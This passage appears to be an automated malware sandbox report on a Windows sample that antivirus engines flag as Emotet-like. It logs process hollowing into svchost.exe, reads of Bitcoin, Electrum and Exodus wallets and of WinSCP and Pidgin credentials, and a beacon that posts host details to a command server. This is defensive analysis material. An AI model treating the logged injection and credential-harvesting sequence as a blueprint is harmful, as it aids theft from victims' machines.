RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}	1	0	0

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: ae36280865306dd00469525bd419ef20806add54

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 9, 2021, 9:50 a.m.	process_identifier: 2688 region_size: 294912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0x000002d8	1	0	0

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Bitcoin\wallets
file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Harvests credentials from local FTP client softwares (1 event)

registry

HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Harvests information related to installed instant messenger clients (1 event)

file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 9, 2021, 9:50 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2688 process_handle: 0x000002d8	1	1	0

Collects information about installed applications (32 events)

Time & API	Arguments	Status	Return	Repeated
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Reader 9 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	1	0	0
RegQueryValueExW July 9, 2021, 9:50 a.m.	key_handle: 0x00000298 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1	0	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Process injection	Process 2408 called NtSetContextThread to modify thread in remote process 2688
Time & API	Arguments	Status	Return	Repeated
NtSetContextThread July 9, 2021, 9:50 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199552 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002d4 process_identifier: 2688	1	0	0

Appends a known CryptoMix ransomware file extension to files that have been encrypted (1 event)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (1 event)

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestA July 9, 2021, 9:50 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: GUID=8962251904648732308&BUILD=0707in2_wvcr&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)	1	1	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Process injection	Process 2408 resumed a thread in remote process 2688
Time & API	Arguments	Status	Return	Repeated
NtResumeThread July 9, 2021, 9:50 a.m.	thread_handle: 0x000002d4 suspend_count: 1 process_identifier: 2688	1	0	0

Generates some ICMP traffic

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

MicroWorld-eScan	Gen:Heur.Pack.Emotet.6
FireEye	Generic.mg.ed1921467f6784af
McAfee	Artemis!ED1921467F67
BitDefenderTheta	Gen:NN.ZexaF.34790.Uu0@aO44wCdi
APEX	Malicious
Paloalto	generic.ml
BitDefender	Gen:Heur.Pack.Emotet.6
Ad-Aware	Gen:Heur.Pack.Emotet.6
Emsisoft	Gen:Heur.Pack.Emotet.6 (B)
McAfee-GW-Edition	BehavesLike.Win32.Rootkit.bh
Sophos	ML/PE-A
Ikarus	Trojan.Win32.Krypt
GData	Gen:Heur.Pack.Emotet.6
Microsoft	Program:Win32/Wacapew.C!ml
Cynet	Malicious (score: 100)
ALYac	Gen:Heur.Pack.Emotet.6
MAX	malware (ai score=86)
SentinelOne	Static AI - Suspicious PE
Cybereason	malicious.67f678
Qihoo-360	HEUR/QVM20.1.72FB.Malware.Gen

Executed a process and injected code into it, probably while unpacking (7 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW July 9, 2021, 9:50 a.m.	thread_identifier: 2692 thread_handle: 0x000002d4 process_identifier: 2688 current_directory: filepath: track: 1 command_line: C:\Windows\System32\svchost.exe filepath_r: stack_pivoted: 0 creation_flags: 1060 (CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000002d8	1	1	0
NtAllocateVirtualMemory July 9, 2021, 9:50 a.m.	process_identifier: 2688 region_size: 294912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0x000002d8	1	0	0
WriteProcessMemory July 9, 2021, 9:50 a.m.	buffer: base_address: 0x00400000 process_identifier: 2688 process_handle: 0x000002d8	1	1	0
NtGetContextThread July 9, 2021, 9:50 a.m.	thread_handle: 0x000002d4	1	0	0
WriteProcessMemory July 9, 2021, 9:50 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2688 process_handle: 0x000002d8	1	1	0
NtSetContextThread July 9, 2021, 9:50 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199552 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002d4 process_identifier: 2688	1	0	0
NtResumeThread July 9, 2021, 9:50 a.m.	thread_handle: 0x000002d4 suspend_count: 1 process_identifier: 2688	1	0	0